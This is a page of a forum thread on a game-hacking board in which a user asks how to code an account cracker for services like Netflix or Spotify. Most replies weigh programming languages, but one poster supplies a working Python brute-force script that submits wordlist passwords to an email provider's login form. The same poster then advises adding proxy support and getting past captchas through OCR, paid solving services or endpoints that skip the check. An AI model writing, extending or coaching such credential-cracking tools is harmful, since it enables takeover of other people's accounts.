Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Programming › Coders Lounge › Coding a Cracker

LightbulbCoding a Cracker

Posts 1–15 of 35 · Page 1 of 3
BlueCow
BlueCow
Coding a Cracker
Hello everyone, I want to code an account cracker for netflix or spotify or whatever for educational purposes ( I know sentry mba exist that's why it's educational) to understand how it's done and what libs and functions to use. I know the basic syntax and have some knowledge of python 3, javascript, C# and C++. I have looked around on the internet for some info, but since cracking accounts isn't actually very legal I didn't find much about which language is best to do such a thing and besides there are tools coded in C#, C++ and python so I don't know which to use. It's probably partly preference but what is the best language to code an account cracker in ? and what are the libs/functions I need to use. btw I am using a mac so windows.h and that kinda stuff in c++ doesn't work. Also, is perl worth learning for cracking ?

Thank you for reading and helping me out <3
#1 · edited 9y ago · 9y ago
K4LI
K4LI
Quote Originally Posted by BlueCow View Post
Hello everyone, I want to code an account cracker for netflix or spotify or whatever for educational purposes ( I know sentry mba exist that's why it's educational) to understand how it's done and what libs and functions to use. I know the basic syntax and have some knowledge of python 3, javascript, C# and C++. I have looked around on the internet for some info, but since cracking accounts isn't actually very legal I didn't find much about which language is best to do such a thing and besides there are tools coded in C#, C++ and python so I don't know which to use. It's probably partly preference but what is the best language to code an account cracker in ? and what are the libs/functions I need to use. btw I am using a mac so windows.h and that kinda stuff in c++ doesn't work. Also, is perl worth learning for cracking ?

Thank you for reading and helping me out <3
Seems very interesting, I can't help you so far but I'd like you to keep us updated in your work
Good luck with that
#2 · 9y ago
ET
ETHerthethaethaetheh
Cool! Good luck and keep us updated!
#3 · 9y ago
BlueCow
BlueCow
Quote Originally Posted by K4LI View Post
Seems very interesting, I can't help you so far but I'd like you to keep us updated in your work
Good luck with that

Quote Originally Posted by gusitis00 View Post
Cool! Good luck and keep us updated!
I'll do some more research and update if I find anything useful, Thanks for the support.
#4 · 9y ago
BlueCow
BlueCow
Alright, so I'm not sure about this I think I should start off by using the cURL library : website
I'm gonna try to use this to visit a web page, enter some values stored in variables and retrieve information on the webpage to see if the credentials are valid or not. Also, for those on Windows that are using Visual Studio I found a good text tutorial that explains how to install, link, include and use libcurl, you can find it here.
I'm not an awesome programmer so I might fail but it looks like cURL can do all of this.
#5 · edited 9y ago · 9y ago
Azuki
Azuki
i feel like something like this should be coded in c#.
maybe thats just me being biased as a c# programmer but still.
#6 · 9y ago
MA
MaxGen
honestly most of the time these shitty crackers people sell are coded in vb. personally i think vb is the pussy of coding but whatever. you should be fine with any .net languages so c# would also be fine. GL with cURL i havent done anything with that before
#7 · edited 9y ago · 9y ago
BlueCow
BlueCow
Quote Originally Posted by MaxGen View Post
honestly most of the time these shitty crackers people sell are coded in vb. personally i think vb is the pussy of coding but whatever. you should be fine with any .net languages so c# would also be fine. GL with cURL i havent done anything with that before
That is exactly why I don't want to use VB or C# but it seems like they are the easiest to code a cracker.
#8 · 9y ago
MA
MaxGen
Quote Originally Posted by BlueCow View Post
That is exactly why I don't want to use VB or C# but it seems like they are the easiest to code a cracker.
you know what if you dont need great graphical interface you should think about python. its great you can do almost anything with that
#9 · 9y ago
Nimboso
Nimboso
I'd go python. Its a super easy language to write a brute forcer in. Here's an example of one I wrote for an email service. No proxy support or captcha bypass though. Just a basic example.

Code:
    import requests, sys
    from bs4 import BeautifulSoup

    ses = requests.Session()
    login = ses.get('https://www.gm*****.uk/#.1730818-header-navlogin2-1')

    soup_login = BeautifulSoup(login.content, 'html5lib').find('form').find_all('input')
    loginDict = {}
    for u in soup_login:
        if u.has_attr('value'):
            loginDict[u['name']] = u['value']
    loginDict['username'] = 'hackmereddit@gm*****.uk'

    with open('dict.txt', 'r') as dict:
        for word in dict:
            word = word.strip()
            loginDict['password'] = word
            resp = ses.post('https://login.gm*****.uk/login', data=loginDict)
            print(word)
            if '.navigator-bs.gm*****.uk' in resp.cookies.list_domains():
                print(word)
                print(resp.cookies)
                sys.exit()
#10 · 9y ago
BlueCow
BlueCow
Quote Originally Posted by Nimboso View Post
I'd go python. Its a super easy language to write a brute forcer in. Here's an example of one I wrote for an email service. No proxy support or captcha bypass though. Just a basic example.

Code:
    import requests, sys
    from bs4 import BeautifulSoup

    ses = requests.Session()
    login = ses.get('https://www.gm*****.uk/#.1730818-header-navlogin2-1')

    soup_login = BeautifulSoup(login.content, 'html5lib').find('form').find_all('input')
    loginDict = {}
    for u in soup_login:
        if u.has_attr('value'):
            loginDict[u['name']] = u['value']
    loginDict['username'] = 'hackmereddit@gm*****.uk'

    with open('dict.txt', 'r') as dict:
        for word in dict:
            word = word.strip()
            loginDict['password'] = word
            resp = ses.post('https://login.gm*****.uk/login', data=loginDict)
            print(word)
            if '.navigator-bs.gm*****.uk' in resp.cookies.list_domains():
                print(word)
                print(resp.cookies)
                sys.exit()
Nice !! Would it be possible to add captcha bypass and proxy support using some libs though ?! If so, I'm going straight for python, besides I did a bit of research and although it is not really easy to do it is possible to make gui's in python.
#11 · 9y ago
Nimboso
Nimboso
Quote Originally Posted by BlueCow View Post
Nice !! Would it be possible to add captcha bypass and proxy support using some libs though ?! If so, I'm going straight for python, besides I did a bit of research and although it is not really easy to do it is possible to make gui's in python.
Yeah its relatively easy to add socks proxy support. Captcha bypassing is harder though. There are OCR libraries that can bypass basic captcha, but if they use recaptcha you'll have to go with a service like DeathByacapthca, but thats the same for every language.

A large part of bypassing captchas is finding a way to make the web app not require it. I think I found something for steam but I need to keep testing, and I've definitely found one for neopets lol.
#12 · edited 9y ago · 9y ago
New
New
Quote Originally Posted by MaxGen View Post
i think vb is the pussy of coding but whatever.
It has simpler syntax. Apart from that, anything achieved in C# can be achieved in vb.net and vice versa.
#13 · 9y ago
BlueCow
BlueCow
So, I think I'm gonna go for pyhton and try to make a v1 without proxies and if it turns out not too bad I'll make a v2. Thanks for your help guys ! Btw, I'm on mac and I was thinking of going for Pycharm as the IDE (https://www.jetbrains.com/pycharm/?fromMenu) does anyone know if it's good or if I should use something else ? Thanks !!
#14 · 9y ago
Nimboso
Nimboso
Quote Originally Posted by BlueCow View Post
So, I think I'm gonna go for pyhton and try to make a v1 without proxies and if it turns out not too bad I'll make a v2. Thanks for your help guys ! Btw, I'm on mac and I was thinking of going for Pycharm as the IDE (https://www.jetbrains.com/pycharm/?fromMenu) does anyone know if it's good or if I should use something else ? Thanks !!
Pycharm is a good one, it's what I use.
#15 · 9y ago
Posts 1–15 of 35 · Page 1 of 3

Post a Reply

Similar Threads

  • Selling Brute Force/Cracker Source CodeBy johnstalie in Selling Accounts/Keys/Items
    3Last post 13y ago
  • AQW code crackers...By vincelee1998 in Adventure Quest Worlds (AQW) Help
    1Last post 12y ago
  • Minecraft Cracker / Gift Code Methods / MC Accounts / Poison PluginBy Sandwich in Selling Accounts/Keys/Items
    17Last post 12y ago
  • How long till a code cracker comes out XDBy santasfoot in Rust Discussions & Help
    0Last post 12y ago
  • Sell pw cracker for runescape for retail code!!!By Maartenthebest in Trade Accounts/Keys/Items
    11Last post 19y ago

Tags for this Thread

#c++#coding#cracker#help#language#mac#python